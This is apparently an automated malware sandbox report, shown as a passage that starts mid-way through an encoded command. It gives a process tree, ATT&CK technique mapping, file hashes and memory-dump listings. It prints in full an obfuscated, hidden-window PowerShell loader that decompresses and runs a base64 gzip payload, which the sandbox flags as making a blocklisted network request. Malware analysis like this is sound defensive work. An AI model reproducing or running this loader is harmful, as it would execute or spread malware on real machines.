EQAQgBRAGQANwB1AHoARwBnAHYAVQBTAE4ASgBTAGYANgBrACcAJwArACcAJwA2AFIAcwA4ADkAeQBOAGwAQwA4AEMAYwB7ADIAfQAnACcAKwAnACcALwBvADYANAB4AFgAdAAvADAAbgB5AEMAdgBiAHUAJwAnACsAJwAnAFUASgB4AEcAVQBDAE0AVABNAHMAVwB4AHAAdABlAGgAQwBqAHoAbwBmAGIAawBVAHUAYwBDAEgAeQBFAE8AUAAwAEUAeABiAGUAMABTAGMAeABiAHoAVgBVAHAATwBFADYAbgBIADMAOABvAHIAVwBmADYAcQAvAHAANwBiAC8AWQBhAEsATQAxAEMAUgBLAEUAdQBZAGEAewAxAH0AZQB1AHEAUABHAFUAdQAwADgASgBxAGUATQBGAEIAeQB7ADIAfQBlAE4AeQA0AHQAagB7ADIAfQBOAE0AWQBVAGQAQgBiAGEAWQBTADEAdABSAEsARwBWAGUATQBhAGEATABnAFEAbwBiAHcAbQBsAHUARgAyAHUARQByAFIAOQBOAGUAdQB1AHQASQBuAHcAbQByAEwAdwBNADcAOAB2AFIAeAA0ADgATABNAEIATAA2AFYATgBGAEUAYQB7ADIAfQBNAGMAQgB6AHkAcwBTAHYAdQBXAEoATQBIAFkAbABmAGEAUwBmAEcAeABKADMAKwA1AGEAaAB5AFUASAA4AFMAewAyAH0AcwBXAGcAegB1AEEAcABxAEwAJwAnACsAJwAnAGMASABvAFUARAB2AEwASQBXAGgARABGADcANAA4AFcANwBHAGMAYwBCAHMAVwA3AGUATAAwAEgASABhAGoAZQBRAG0ATwBIAE8AWABOAHEAdAB3AFcAQQBLAG0AUAAwAE4AWAB3AG4AdgB6ADUAbgB3AG0AdgB3AEEATABVAEcAZQBMADQAcwBOAGoATgBJAEUAVwBDAC8AdwBvADkAQwB7ADIAfQBSAGQAYgB5ACsAcwB0AHEASgBTAEYAMwBlACsAYgBOAGUAZQB7ADEAfQBFAGMASQBmAC8ALwA5AGsAegBjAHYAewAxAH0ALwA3AGoAOQBwAGsAeQBTAHEAawBkAHMAdgBqAHIAOQA4AHUARABWAHMAUAAyAE8AQQBMAHsAMgB9AEkAYwBLAEEAMABZAGYAUgBSAGYARgByAEcAMwBzAFQAaABYAEMAewAyAH0AdgB3AGcAdQB4AGcAUwBwAFkAbgA1AC8AewAyAH0AWAA1AFIASgB6AHEALwBHAHMAUABBAGUAaAArAC8AZgBXAGoAKwBtAHMAUgAwAE4AQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBaACcAJwAsACcAJwBpACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAHd74WcCA7VXa2/{2}Rhf+Xqn/waqQMCoBA042'+'rFSpNmAw{2}7n5lkBRNbEHe2DscexxgLT97z3mssl2k/fdVlpLKPbMuT7nmnUee5ywWKDtyUD448cfhPMzRSmKBLGUrq+rQmntd54qL5el7SRoEeEXQVwqSdJlESLx6uPHTp6mOOan71ofcyXLcPRACc7E{2}vC'+'n4IY4xVeThw32uPCHUPq91qfsAdEz2aGDvBALV0rsF3cj5qHCtJq{1}UMLF8m+/lSvLq8aq1nvMEc3EsnnIOI5qPqXl{2}vBXp'+'VBoHRIslg3{2}pSxja15zSdxq1uw'+'4Q2s8BmlP2MA8{1}H5WBm9e/Ekxz9P47FYh50QlluF1mjJP8f0U{1}1m'+'5K{2}wLDcvV6'+'ldxeVY/z2NOIlzTY45Tlpg4fSIezmoDFPsUz/F6BVwmT0kcrCoVIHt{2}WyyW4pzSqvBvxIhjvLuA961M4msmoJrytFKFqL7lqMH8nO'+'ITa/kNS4tUqMBzSQdA8K'+'8CxPUlhcI8fSODXg4uz/J4g8FkccoycuT9R{1}CqggG6EWfpAT5LVprjyuoz4KCUVb9VVuPC'+'CGybvd2Fo6XD{2}L96EfBF/EtEH{2}QF0fv{1}3MVrEuPuIUYR8S4JK74VE7ym+AhI7UI2BgvF8vkC+11McYB4AXKRGl+x9SLCP/O'+'qOaE+ThUP4pqBVRDyypfGnOImlvXYwBGAd/ouF2GCMsEX6nNpHC7a{2}2'+'8gKncoyrKqMM2hTr2qYGJEsV8VlDgj5ysl5+z4Wn4x18gpJx7K+EXcqvIPOM9qOyzOeJp7EFaAwDIT7BFEC0SqwoD4WD2YJL{2}oL7+JRwdRCtUDkp4gHnBS4GDyIllSv3CTVWom5nqUUBwBxbFraBQF0CPOFXLMLRRgv/yOm{1}c6OCV9gcsFkFdGQrBNynhVcEjKoQcVGBfp9R9s+Lr3HI3ppPgcGvFSXkv1wIsCK'+'D13ESty9AzQEY6UAxRay{2}IV{1}fhGPrU{1}8af6hEwVeO71mBr+cEsa+g5+Bvxs0tJ{1}94P/abg{1}1A2vk03'+'72q1CdsHOux0rnj/0cdt0{1}G72dN6{1}KoM{1}kVQ59FTJKt4bQUCk4F7xx7P'+'Qo9K0F43Gerav7'+'w{1}uIeskw5Plw{1}2ktFrypCVtAb174NsCT0R2+xG8Qz+djFQ9UyWd9oad+YPb1BYuHdRlLVy7LDNv7rv1er3to/419RWV+U2aI2fOrIEXqfW6Y/jcshtjy/45bBV+Wm77Brn77N68bYw2SvCp1wjvgcfvt59RNwtM91pauLvAcrWN3mtbuhY'+'EhjVfjxu3h0+mqnoDNVs4Pr3f8sTv3DaNrp0bprwfmwozpdC27F2m9/cJatrBvOlsU'+'PM20bUF9eJx8tCUnwzLy8cdea9r43ARaQdkvpIxU9mELq4TsBtsflTAbqTOsKJ0WXfXU5ROO0Hd+QbboF/SHo3+vIEG29bC3UsPd8n84Xl+N2uFLU9b2E40j7EzHLnxcON0GkM32nL'+'s8ntLS5rWXXgz7tHBrOE0711qGgP/4MRz1euqkdPkLdPWus4mBBkzCW+G63kvJLYUzp0oGTr99{2}'+'c00NSH5u7auhvm1mbeR60xcpp+/2EQQqjt/bzBFLsf3pFFvV9vu8M9HTOlO2KhBnFo+JYTbVLHlD/AnYuC{1}I105RmcG8p91rP7bO1EYWOe3ACvc4ydEwVcDcOCXtsNbBvpgaVArOdTpSFP647Vuhvf9DKIrvo46wcKIKUg+M0U1UIa2do/39UbC9Atx7HTDBQd7uzGgvUSNJSf6k'+'6Rs89yNlC8Cc{2}'+'/o64xXt/0nyCvbu'+'UJxGUCMTMsWxptehCjzofbkUucCHyEOP0Exbe0ScxbzVUpOE6nH38orWf6q/p7b/YaKM1CRKEuYa{1}euqPGUu08JqeMFBy{2}eNy4tj{2}NMYUdBbaYS1tRKGVeMaaLgQobwmluF2uErR9NeuutInwmrLwM78vRx48LMBL6VNFEa{2}McBzysSvuWJMHYlfaSfGxJ3+5ahyUH8S{2}sWgzuApqL'+'cHoUDvLIWhDF748W7GccBsW7eL0HHajeQmOHOXNqtwWAKmP0NXwnvz5nwmvwALUGeL4sNjNIEWC/wo9C{2}Rdby+stqJSF3e+bNee{1}EcIf//9kzcv{1}/7j9pkySqkdsvjr98uDVsP2OAL{2}IcKA0YfRRfFrG3sThXC{2}vwguxgSpYn5/{2}X5RJzq/GsPAeh+/fWj+msR0NAAA{0}')-f'=','Z','i')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3060

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29KP6AEF9N7JRY6Q65FU.temp

Filesize
7KB

MD5
ef910c914aa12a4a153cf674644692ad

SHA1
ce913a24d4df24f0444687dcce805cb7474ed514

SHA256
00bb1f541ff146f2974298f226e763b05cabb9cd60082f383717dbe881e62499

SHA512
96d873eca6b136606a082c29775342263effa75047df0f49dfee2d087fed17373d38826878c0611bec67bd7c86b3fc7a7b5b4d00bcd27951c480fa81ea8174ef

Download Submit
memory/2680-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

Filesize
4KB

Download
memory/2680-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2680-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2680-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-11-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-12-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-15-0x0000000002B30000-0x0000000002B31000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing